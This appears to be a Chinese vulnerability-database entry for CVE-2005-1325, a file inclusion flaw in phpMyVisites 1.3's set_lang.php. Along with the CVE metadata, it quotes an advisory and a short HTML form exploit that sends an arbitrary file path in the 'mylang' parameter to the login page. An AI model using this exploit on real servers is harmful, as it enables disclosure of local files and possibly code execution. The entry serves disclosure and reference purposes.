PHPMyVisites Set_Lang文件包含漏洞

22次阅读
没有评论

PHPMyVisites Set_Lang文件包含漏洞

漏洞ID 1108710 漏洞类型 输入验证
发布时间 2005-04-26 更新时间 2005-10-20
PHPMyVisites Set_Lang文件包含漏洞CVE编号 CVE-2005-1325
PHPMyVisites Set_Lang文件包含漏洞CNNVD-ID CNNVD-200505-380
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/25531
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-380
|漏洞详情
phpMyVisites1.3的set_lang.php允许远程攻击者通过mylang参数来读取和包含任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/13370/info

phpMyVisites allows attackers to include arbitrary files. While it has been demonstrated that local files may be included through this vulnerability, there is an unconfirmed possibility of remote file inclusion.

Exploitation could disclose local files, or in the case of remote file inclusion, let the attacker execute malicious PHP code.

The issue is known to affect phpMyVisites 1.3. Other versions may also be affected. 

<form action="http://[pathtoyourphpMyVisites]/login.php" method="POST">
Local file: <input type="text" name="mylang" value="" />
<input type="submit" value="Alexx says RELAX!">
</form>
|参考资料

来源:BID
名称:13370
链接:http://www.securityfocus.com/bid/13370
来源:BUGTRAQ
名称:20050426[exploits]phpMyVisites1.3localfileretrieval
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111454298603060&w;=2
来源:cvs.sourceforge.net
链接:http://cvs.sourceforge.net/viewcvs.py/phpmyvisites/phpmyvisites/include/set_lang.php?r1=1.5&r2;=1.6

相关推荐: YaBB 1.x/9.1.2000 – Administrator Command Execution

YaBB 1.x/9.1.2000 – Administrator Command Execution 漏洞ID 1054624 漏洞类型 发布时间 2004-09-17 更新时间 2004-09-17 CVE编号 N/A CNNVD-ID N/A 漏洞平台 …

正文完
 0